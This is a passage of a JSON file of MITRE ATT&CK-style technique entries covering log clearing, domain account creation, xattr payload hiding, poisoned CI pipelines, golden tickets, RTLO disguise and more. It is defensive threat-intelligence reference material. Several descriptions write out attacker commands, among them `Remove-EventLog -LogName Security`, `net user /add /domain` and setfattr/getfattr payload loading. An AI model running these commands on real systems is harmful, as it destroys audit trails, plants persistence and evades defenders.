or PowerShell. For example, adversaries may use the PowerShell command `Remove-EventLog -LogName Security` to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot. Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\\Windows\\System32\\winevt\\logs\\`.", "detection": ""}, {"attack_id": "T1136.002", "name": "Domain Account", "tactics": ["persistence"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", "detection": ""}, {"attack_id": "T1564.014", "name": "Extended Attributes", "tactics": ["stealth"], "platforms": ["Linux", "macOS"], "description": "Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. Extended attributes are key-value pairs of file and directory metadata used by both macOS and Linux. They are not visible through standard tools like `Finder`, `ls`, or `cat` and require utilities such as `xattr` (macOS) or `getfattr` (Linux) for inspection. Operating systems and applications use xattrs for tagging, integrity checks, and access control. On Linux, xattrs are organized into namespaces such as `user.` (user permissions), `trusted.` (root permissions), `security.`, and `system.`, each with specific permissions. On macOS, xattrs are flat strings without namespace prefixes, commonly prefixed with `com.apple.*` (e.g., `com.apple.quarantine`, `com.apple.metadata:_kMDItemUserTags`) and used by system features like Gatekeeper and Spotlight. An adversary may leverage xattrs by embedding a second-stage payload into the extended attribute of a legitimate file. On macOS, a payload can be embedded into a custom attribute using the `xattr` command. A separate loader can retrieve the attribute with `xattr -p`, decode the content, and execute it using a scripting interpreter. On Linux, an adversary may use `setfattr` to write a payload into the `user.` namespace of a legitimate file. A loader script can later extract the payload with `getfattr --only-values`, decode it, and execute it using bash or another interpreter. In both cases, because the primary file content remains unchanged, security tools and integrity checks that do not inspect extended attributes will observe the original file hash, allowing the malicious payload to evade detection.", "detection": ""}, {"attack_id": "T1589.003", "name": "Employee Names", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures. Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: Phishing or Valid Accounts).", "detection": ""}, {"attack_id": "T1677", "name": "Poisoned Pipeline Execution", "tactics": ["execution"], "platforms": ["SaaS"], "description": "Adversaries may manipulate continuous integration / continuous development (CI/CD) processes by injecting malicious code into the build process. There are several mechanisms for poisoning pipelines: * In a Direct Pipeline Execution scenario, the threat actor directly modifies the CI configuration file (e.g., `gitlab-ci.yml` in GitLab). They may include a command to exfiltrate credentials leveraged in the build process to a remote server, or to export them as a workflow artifact. * In an Indirect Pipeline Execution scenario, the threat actor injects malicious code into files referenced by the CI configuration file. These may include makefiles, scripts, unit tests, and linters. * In a Public Pipeline Execution scenario, the threat actor does not have direct access to the repository but instead creates a malicious pull request from a fork that triggers a part of the CI/CD pipeline. For example, in GitHub Actions, the `pull_request_target` trigger allows workflows running from forked repositories to access secrets. If this trigger is combined with an explicit pull request checkout and a location for a threat actor to insert malicious code (e.g., an `npm build` command), a threat actor may be able to leak pipeline credentials. Similarly, threat actors may craft pull requests with malicious inputs (such as branch names) if the build pipeline treats those inputs as trusted. Finally, if a pipeline leverages a self-hosted runner, a threat actor may be able to execute arbitrary code on a host inside the organization’s network. By poisoning CI/CD pipelines, threat actors may be able to gain access to credentials, laterally move to additional hosts, or input malicious components to be shipped further down the pipeline (i.e., Supply Chain Compromise).", "detection": ""}, {"attack_id": "T1482", "name": "Domain Trust Discovery", "tactics": ["discovery"], "platforms": ["Windows"], "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain. Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct SID-History Injection, Pass the Ticket, and Kerberoasting. Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP. The Windows utility Nltest is known to be used by adversaries to enumerate domain trusts.", "detection": ""}, {"attack_id": "T1558.001", "name": "Golden Ticket", "tactics": ["credential-access"], "platforms": ["Windows"], "description": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket. Golden tickets enable adversaries to generate authentication material for any account in Active Directory. Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS. The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets. The KRBTGT password hash may be obtained using OS Credential Dumping and privileged access to a domain controller.", "detection": ""}, {"attack_id": "T1020", "name": "Automated Exfiltration", "tactics": ["exfiltration"], "platforms": ["Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel and Exfiltration Over Alternative Protocol.", "detection": ""}, {"attack_id": "T1592.004", "name": "Client Configurations", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone. Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: listening ports, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors. Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or External Remote Services).", "detection": ""}, {"attack_id": "T1219.001", "name": "IDE Tunneling", "tactics": ["command-and-control"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may abuse Integrated Development Environment (IDE) software with remote development features to establish an interactive command and control channel on target systems within a network. IDE tunneling combines SSH, port forwarding, file sharing, and debugging into a single secure connection, letting developers work on remote systems as if they were local. Unlike SSH and port forwarding, IDE tunneling encapsulates an entire session and may use proprietary tunneling protocols alongside SSH, allowing adversaries to blend in with legitimate development workflows. Some IDEs, like Visual Studio Code, also provide CLI tools (e.g., `code tunnel`) that adversaries may use to programmatically establish tunnels and generate web-accessible URLs for remote access. These tunnels can be authenticated through accounts such as GitHub, enabling the adversary to control the compromised system via a legitimate developer portal. Additionally, adversaries may use IDE tunneling for persistence. Some IDEs, such as Visual Studio Code and JetBrains, support automatic reconnection. Adversaries may configure the IDE to auto-launch at startup, re-establishing the tunnel upon execution. Compromised developer machines may also be exploited as jump hosts to move further into the network. IDE tunneling tools may be built-in or installed as IDE Extensions.", "detection": ""}, {"attack_id": "T1036.002", "name": "Right-to-Left Override", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png. Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with Spearphishing Attachment/Malicious File since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity. RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.", "detection": ""}, {"attack_id": "T1588.001", "name": "Malware", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).", "detection": ""}, {"attack_id": "T1027.017", "name": "SVG Smuggling", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files. SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `